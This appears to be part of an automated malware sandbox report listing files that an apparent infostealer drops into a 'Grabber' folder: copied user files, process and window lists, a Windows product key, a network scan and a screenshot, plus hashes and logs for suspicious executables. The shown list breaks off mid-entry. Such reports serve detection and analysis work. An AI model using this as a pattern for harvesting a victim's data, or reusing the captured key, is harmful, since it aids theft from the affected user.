                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):3.5191090305155277
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                      MD5:3A37312509712D4E12D27240137FF377
                                                                                      SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                      SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                      SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):190
                                                                                      Entropy (8bit):3.5497401529130053
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                      MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                      SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                      SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                      SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):190
                                                                                      Entropy (8bit):3.5497401529130053
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                      MD5:87A524A2F34307C674DBA10708585A5E
                                                                                      SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                      SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                      SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):504
                                                                                      Entropy (8bit):3.514398793376306
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                      MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                      SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                      SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                      SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\System\Process.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):20148
                                                                                      Entropy (8bit):5.725277389690851
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:LgHYJhTsnJ55Pk3A/FjGmu7E9HjNjTVCl1PB5gs62gEbEVO+XjrcRFA5CpATNeaa:LgHYJhTsnJ55Pk3A/FjGZ7E9HjNjTVCP
                                                                                      MD5:899E408ED7A54458B10DA7D46E86330B
                                                                                      SHA1:FB2AAA62253B5D3AF90318B25458369983A1B372
                                                                                      SHA-256:CA29359FE8B8611FAF24752ABA09332AA5EECEB414355AFC541FBE0BBD6BEC61
                                                                                      SHA-512:02997C114AF7A1256ED3D088AAC6F015804329BC023F37DFD935720E5F24CBD5B73EE4DC4D7DAF37E1D3F062F68BBB920969F5125DB96600C07A599F3B2DECAB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NAME: Client (1).vmp..PID: 4980..EXE: C:\Users\user\AppData\Roaming\Client (1).vmp.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..PID: 2584..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..PID: 5168..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..PID: 1288..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..PID: 5764..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..PID: 3440..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: RuntimeBroker..PID: 4732..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: jOVV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\System\ProductKey.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29
                                                                                      Entropy (8bit):4.211260736432281
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:j91iTzyXaQuujn:B1wvLub
                                                                                      MD5:FC5517ED714EB363A24E83B0BC4767BD
                                                                                      SHA1:72F2693336301DE8A6E74A758396ADF7ED972599
                                                                                      SHA-256:F98B61C5A4804DA7F245F29E97E4A489C3750955072660C155860AA57A9EE165
                                                                                      SHA-512:14A3F4F4C1C7D84EE53E62578AE82E9E09B0BE5F683D34FA021DE0826C7DAA4018669024B12F3C8E5EC2CC8A9DB564C81D62A2567984EFD7C277892D66ACBCEF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:97XPF-N46VW-4CR4Y-H7THK-P2DMB

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\System\ScanningNetworks.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):84
                                                                                      Entropy (8bit):4.6630509827051725
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                                      MD5:58CD2334CFC77DB470202487D5034610
                                                                                      SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                                      SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                                      SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\System\Windows.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-8 text
                                                                                      Category:dropped
                                                                                      Size (bytes):16459
                                                                                      Entropy (8bit):5.735903135270173
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:m2XoZonKJJn0HqWVznWuiRRAM8EFjCv1FfRAdGwv+Vf2uhVQAQjdy+DN0IV8wtN+:m2XoZonKJJn0HqWVznpiRRAM8EFjCv1T
                                                                                      MD5:3CE461465AFAD6AF8B11A943213E603F
                                                                                      SHA1:A377162222AB6ECC3575AA4E84926F7B83999507
                                                                                      SHA-256:E908C1BBDDEFBF46757649F8EB09DDD86A646724240DA4412E2F39454190B9BF
                                                                                      SHA-512:386369FACB3304840717CF14EBBFEC34164387C4C4CB0F47411ED455EBCD8846BBFC32CA7479DD0383550040FD7759F537BB1928E10955D1AC11E8069428AF1B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NAME: jOVVcPOCpkReqkVLNFhXvhIlv..TITLE: New Tab - Google Chrome..PID: 2584..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..TITLE: New Tab - Google Chrome..PID: 5168..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..TITLE: New Tab - Google Chrome..PID: 1288..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..TITLE: New Tab - Google Chrome..PID: 5764..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..TITLE: New Tab - Google Chrome..PID: 3440..EXE: C:\Program Files (x86)\YQGqYwlICKjtosofqgCpkCZKJpBsQxjqboUmNCSJDZsWfIqg\jOVVcPOCpkReqkVLNFhXvhIlv.exe..NAME: jOVVcPOCpkReqkVLNFhXvhIlv..TITLE: New Tab - Google Chrome..PID: 2576..EXE:

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\System\WorldWind.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):155685
                                                                                      Entropy (8bit):7.875815950054893
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:AnekupoQrsMNbAtwxIIPAhIpWYGsCN3X4pxGdjKw31fK8gWmSWcE:AnevqQIYbbxdPA0GsQ3X4px22w3RKXVb
                                                                                      MD5:F363BE1E6AF5F1ECBA4F6721F9A539DB
                                                                                      SHA1:AB59A4820D19898B3ED1D8E99AFA2815B504C5C5
                                                                                      SHA-256:099819A83A543EE388B9DAAA3E1C240ED0993BF7854E6087D7D23A8806C941C4
                                                                                      SHA-512:94CC4C5A9C0AEDE5FC2234BD93A2B6347DB266F9EE216EFE0B72FDBFE4BAC52420D0F165C23E4330C437D2752DDBF7AE16C2234BA3B8F8C1B257C7B734C28ECC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%..f..r.....Uf.[...?.2......S.])o.s......T..w6.y.:.....CPWJi.......... ..Z.J+.....a..S.=...j.$.........W.Yjvu?.Y.....`f?............1?.....W'y../n-.o.dh.c...k....1.q.;......8D.^6O.?.QE..q..Rf..QFk..G.t._E.....n..y..].{..k......m_[.....u.8.Y\.h.b...#.........T.........y?......#=O.z...h5......MF.KY

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\msgid.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:modified
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:V:V
                                                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:0

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client (1).vmp.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):1727
                                                                                      Entropy (8bit):5.3718223239563105
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkl+vxp3/elZHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKksZp/elZtp5wmjB
                                                                                      MD5:54355F398C679D65A0FAB059804A155E
                                                                                      SHA1:D4F4857D0489D7D68EF7AE127227D0ED1B3B2BEF
                                                                                      SHA-256:8C9265BD46113AB9D2297CAF941A97F49651123CE19B776FE0F990144488D53B
                                                                                      SHA-512:5AEFD947B0898E9AAADF060DD0376C4CA85362022AFD66F29DF321C1F662F1E53861D7848F1DA4CDE0AE6D207952B3453AD0439C579CEC3FA34BD39B65E15F6D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Winscreen.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Winscreen.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):1076
                                                                                      Entropy (8bit):5.370431226217922
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNl+84xp3/VclT:MxHKQwYHKGSI6oPtHTHhAHKKkl+vxp3s
                                                                                      MD5:E03E866E7B63185D8CEB7F44277EC9A4
                                                                                      SHA1:DE8F6EEEC888F2326603201C68B68963BBB3BFF8
                                                                                      SHA-256:7F2D2EA09A0C2B986527B00BCF44D37BFCA57039D335BBDBD2DD8C71A48B6ECB
                                                                                      SHA-512:DE1BEA1A3B50AF1490F614F9257A6DEB320F5FBB8A5B2797D8A3070939CAF308807A05B0F9C0612EFC9CD2EFBCEDD5C4B3FEB76C41481A021C725FB540C236F4
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):1281
                                                                                      Entropy (8bit):5.370111951859942
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIA
                                                                                      MD5:183D606A476307F9B728A16FDAD71253
                                                                                      SHA1:517F674A9E8149E92B47C5F7A78D4474AFBCE6E8
                                                                                      SHA-256:38EAF5F7C03D3BD8D1DAEE6F3775E5CE6E2707F8BF1ED90F25F80EAC436B94A9
                                                                                      SHA-512:C67722C04B00260D09CACE2CA7FD10E007E1C1CDE5E07D9DBA3D6CD42FF15624D47EFFD9C282DB75180E4691C8E14BC097BF8BCBD91BB7AC9DAECE99A6402845
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\upx.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\upx.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):226
                                                                                      Entropy (8bit):5.360398796477698
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                      MD5:3A8957C6382192B71471BD14359D0B12
